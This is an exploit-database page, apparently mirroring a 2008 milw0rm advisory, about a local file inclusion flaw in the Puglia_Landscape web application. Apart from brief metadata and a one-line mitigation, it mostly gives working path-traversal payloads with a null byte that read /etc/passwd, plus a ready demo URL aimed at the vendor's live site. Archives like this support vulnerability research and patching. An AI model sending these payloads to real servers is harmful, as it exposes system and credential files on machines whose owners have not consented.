header-logo
Suggest Exploit
vendor:
Puglia_Landscape
by:
StAkeR
8.8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Puglia_Landscape
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Puglia_Landscape Local File Inclusion Vulnerability

Discovered by StAkeR[at]hotmail[dot]it, the vulnerability allows an attacker to include local files on the server by using a null byte injection. Magic_Quotes_GPC must be off for the attack to be successful.

Mitigation:

Ensure that Magic_Quotes_GPC is enabled and that input is properly sanitized.
Source

Exploit-DB raw data:

/*
   ---------------------------------------------------
   Puglia_Landscape Local File Inclusion Vulnerability
   ---------------------------------------------------
   Discovered By StAkeR[at]hotmail[dot]it
   http://www.niclor.net/prodotti/Puglia_Landscape
   ---------------------------------------------------
   
   * Local File Inclusion
   * Note: Magic_Quotes_GPC Off
   
   - index.php?id=../../../../../../../[Local File and NullByte]
   - index.php?id=../../../../../../../etc/passwd%00
   
   * Demo
   - http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00
 
   

*/

# milw0rm.com [2008-11-04]

Navigation

Suggest Exploit

Services By CQR